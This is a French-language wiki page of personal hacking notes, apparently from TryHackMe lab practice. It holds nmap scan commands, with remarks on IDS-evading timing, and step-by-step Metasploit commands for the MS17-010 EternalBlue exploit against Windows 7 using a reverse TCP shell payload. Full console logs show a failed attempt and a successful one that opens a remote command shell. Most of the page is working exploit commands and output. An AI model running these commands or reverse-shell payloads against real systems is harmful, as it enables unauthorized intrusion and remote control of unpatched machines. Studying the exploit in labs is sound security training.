====== Scan & Exploit ======

[[procedures:start|Hacking : procédures]]

===== nmap =====

Scan pas mal mais lent :

<code>
nmap -sV -A -T4 -p- -oN vuln.nmap <the target’s ip address>

The -sV flag looks for the versions of the services running on the ports

-A enables OS detection

-T4 is one of the timing options.
There are 6 timing options.
The options are paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5).
The first two are for IDS evasion. Polite mode uses less bandwidth and target machine resources.
Normal mode (3)is the default.
Aggressive mode speeds the scan up and insane is fast, but isn’t always accurate.
Basically, the slower ones are more accurate and less noisy and are better for IDS evasion.
-T4 is an aggressive, quicker scan. I used this because this scan takes forever on my machine.
I’m not sure it helped much because it still took forever!

-p- Scans all ports

-oN saves the results to the file I named vuln.nmap
</code>

Recherche de vulnérabilités :

<code>
nmap --script vuln <ip> -vv
</code>

===== metasploit =====

Eternal Blue Windows SMB :\\
''%%windows/smb/ms17_010_eternalblue'%%'

<code>
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.42.65
set LHOST 10.8.192.236
set payload windows/x64/shell/reverse_tcp
run
</code>

Il est important de "setter" le LHOST pour le cas où nous avons plusieurs adresses IP.\\
Sinon l'exploit va sans doute fail.

Autre payload à tester :\\
''%%windows/x64/meterpreter/bind_tcp%%''

FAIL :

<code>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.10.171.162:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.171.162:445 - The target is vulnerable.
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > 
</code>

OK :

<code>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.8.192.236:4444 
[*] 10.10.171.162:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.171.162:445 - The target is vulnerable.
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.171.162
[*] Command shell session 1 opened (10.8.192.236:4444 -> 10.10.171.162:49235) at 2021-05-20 18:01:46 +0200
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
</code>

Articles :\\
[[https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/]]\\
[[https://ratiros01.medium.com/tryhackme-blue-dc8b97351248]]\\
[[https://www.jil-wright.com/blog/tryhackme-eternal-blue-ms17-010]]